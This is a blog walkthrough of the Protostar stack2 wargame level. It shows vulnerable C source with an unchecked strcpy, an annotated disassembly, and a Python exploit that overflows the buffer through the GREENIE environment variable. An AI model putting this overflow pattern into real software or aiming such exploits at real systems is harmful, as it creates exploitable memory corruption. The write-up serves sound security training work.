Binary Exploitation Protostar Stack2 - Walkthrough - Writeup

Posted by Suraj Singh on April 07, 2018 · 10 mins read
Hello Guyz,




In This Post, I am going to show you how we can win protostar stack2 level and in today's tutorial, our main focus will be on variable overwriting and environment variable manipulation. In This Challenge, we are going to learn how we can use environment variables as a bridge to Stack so that we can overwrite the values of any variable Onto Stack during running state.

Before Starting This Walkthrough. I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.


Source Code :

 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;

variable = getenv("GREENIE");

if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");
}

modified = 0;

strcpy(buffer, variable);

if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}

}



Hint Provided By Exploit-Exercise

Stack2 looks at environment variables, and how they can be set.

This level is at /opt/protostar/bin/stack2


Stack

0                        28                                                      92        96
============================================================================================
Other Things | Injectable Area | modified |
============================================================================================



Disassembly Of Codes

 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Dump of assembler code for function main:
0x08048494 <+0>: push ebp
0x08048495 <+1>: mov ebp,esp
0x08048497 <+3>: and esp,0xfffffff0
0x0804849a <+6>: sub esp,0x60 << ==== 96 Bits Buffer Created
0x0804849d <+9>: mov DWORD PTR [esp],0x80485e0 << ==== Moving Something Into Stack Top
0x080484a4 <+16>: call 0x804837c <getenv@plt> << ==== Call GetEnvironment Function
0x080484a9 <+21>: mov DWORD PTR [esp+0x5c],eax << ==== Load Number Of GREENIE variable found
0x080484ad <+25>: cmp DWORD PTR [esp+0x5c],0x0 << ==== Comparing GREENIE with number
0x080484b2 <+30>: jne 0x80484c8 <main+52> << ==== Jump Condition
0x080484b4 <+32>: mov DWORD PTR [esp+0x4],0x80485e8
0x080484bc <+40>: mov DWORD PTR [esp],0x1
0x080484c3 <+47>: call 0x80483bc <errx@plt>
0x080484c8 <+52>: mov DWORD PTR [esp+0x58],0x0 << ==== assign 0 into modified variable
0x080484d0 <+60>: mov eax,DWORD PTR [esp+0x5c] << ==== Copy GREENIE variable from stack To EAX
0x080484d4 <+64>: mov DWORD PTR [esp+0x4],eax << ==== Copy GREENIE address from EAX to Top of Stack
0x080484d8 <+68>: lea eax,[esp+0x18] << ==== LOad Starting Address Of Stack To Update buffer variable
0x080484dc <+72>: mov DWORD PTR [esp],eax << ==== Copy Starting Buffer Address To Top Of Stack
0x080484df <+75>: call 0x804839c <strcpy@plt> << ==== call strcpy
0x080484e4 <+80>: mov eax,DWORD PTR [esp+0x58]
0x080484e8 <+84>: cmp eax,0xd0a0d0a
0x080484ed <+89>: jne 0x80484fd <main+105>
0x080484ef <+91>: mov DWORD PTR [esp],0x8048618
0x080484f6 <+98>: call 0x80483cc <puts@plt>
0x080484fb <+103>: jmp 0x8048512 <main+126>
0x080484fd <+105>: mov edx,DWORD PTR [esp+0x58]
0x08048501 <+109>: mov eax,0x8048641
0x08048506 <+114>: mov DWORD PTR [esp+0x4],edx
0x0804850a <+118>: mov DWORD PTR [esp],eax
0x0804850d <+121>: call 0x80483ac <printf@plt>
0x08048512 <+126>: leave
0x08048513 <+127>: ret


Exploit

 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/usr/bin/python
# -*- coding:utf-8 -*-


# import modules
import struct
import os

NP = '41' # 41 [hex] = a

# Total Buffer In Stack 60 in hex
tbis = [NP for i in range(96)]


# var value 92-96 == [esp+5c] | 0xd0a0d0a

tbis[92:] = ['0d','0a','0d','0a'][::-1] # In Reverse



# Remove Padding 0x18 [hex]
payload ='\\x'+ '\\x'.join([i for i in tbis[28:]])


# create a dummy environment variable
os.environ['GREENIE']=payload.decode('string_escape')

# run
os.system('./bin/stack2')





Another Victory! Yeah


For More Detailed Walk through Check Below Provided YouTube Video Playlist

Bitforestinfo YouTube Protostar CTF Playlist